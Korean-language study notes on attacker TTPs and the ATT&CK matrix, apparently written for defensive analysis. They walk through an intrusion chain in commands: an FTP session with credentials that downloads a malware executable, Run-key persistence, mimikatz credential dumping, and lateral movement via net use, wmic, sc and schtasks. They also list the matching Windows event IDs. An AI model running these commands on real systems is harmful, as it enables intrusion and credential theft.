고통의 피라미드
TTP(Tactic, Technique, Procedure)
ATT&CK : 실제 공격에 사용된 전술 및 기술, 대응방안을 나타낸 매트릭스
2022년 상반기 유행
⇒ SMB/Admin Share를 이용한 내부전파(Lateral Movement)
인프라 구축/자원 개발
> cmd
> ftp -v ftp.drivehq.com //ftp서버 연결
> smithjohnxxx //ID
> Pulamea123 //PW
> hhas //파일 접근
> deb //파일 접근
> bin //파일 접근
> get x.exe //악성코드 다운
> bye //disconnect
> exit
악성코드 실행
지속
//경로
Software\microsoft\Windows\CurrentVersion\Run //에다가
//값
C:\WINDOWS\SysWOW64\X.exe //등록
방어회피; Defence Evasion
계정정보 수집
mimikatz: OS 크리덴셜 덤핑
- NTLM해시값, PIN, 커버로스 티켓값 등
- win에서 minkatz예방을 위해서 일부 레지스트리값 수정했음
- 그래서 안먹을수도 있음
https://github.com/gentilkiwi/mimikatz download
privilege::debug //debug
sekurlasa::logonpasswords //크리덴셜 덤핑
lsadump::sam // 로컬계정과 그룹 정보
lsadump::secrets //민감정보라는데?
*password 가 null이면 레지스트리 값 바꿔서 그럼
참고
사용 로그
UEME_RUNPATH:C:\Documents and Settings\nadminb\kiwi1\Win32\mimikatz.exe
FGDump
UEME_RUNPATH:C:\WINDOWS\system32\fgdump.exe
Cain&Abel
UEME_RUNPATH:C:\Program Files (x86)\Cain\Cain.exe
탐색
Tasklist
//프로세스 탐색 명령어process Monitor
기능 활용net user
명령어systeminfo /more
: 시스템 정보확인wmic os get installdate
: OS 설치 날짜 확인wmic cpu get NumberOfCores
: CPU코어개수 확인wmic memorychip
: 메모리 상태확인gpresult /r
: 그룹정책 확인내부 전파
윈도우 공유폴더 연결
C:\\WINDOWS\system32> net use X: \\[접근할서버의 IP]\[접근해야될 디렉토리혹은 드라이브]$ "[패스워드]" /user:[로그인 계정]
//example
C:\\WINDOWS\system32> net use \\192.168.28.130\C$ password /user:192.168.28.131\administrator
연결해제/시스템 종료 전까지 세션 유지&& 유지동안엔 계정검증 하지않는 점 악용
SMB/Admin share 기능이 비활성화 되어있는경우
- emoteRegistry 서비스 활성화 → reg del

//로그 : Security 로그 Event ID 4624, 로그온 유형 3번
Wmic : process call 기능으로 실행
wmic /node:192.168.28.130 /user: administrator process call create "cmd.exe" /c c:\windows\sysWOW64\wmipserv.exe"
SC : 서비스 생성해서 실행
sc \\192.168.28.130 create MSSQL (DATABASE) binpath="cmd.exe /c c:\windows\sys\wmipserv.exe"
//로그 : system 로그 EventID 7045, 7009, 7000
AT, SCHTASKS : 스케줄러 등록해서 실행
schtasks /create /S 192.168.28.130 /U administrator /P ~~password~~ /sc ONCE /ST 18:00 /tn footbar /tr c:\windows\system32\notepad.exe"
// 로그 : Microsoft-Windows-TaskScheduler Operational 로그(기본적으로 비활성)에 Event ID 106
Collection
C&C (=C2)
impact
DNS 스푸핑 같은 거라고 생각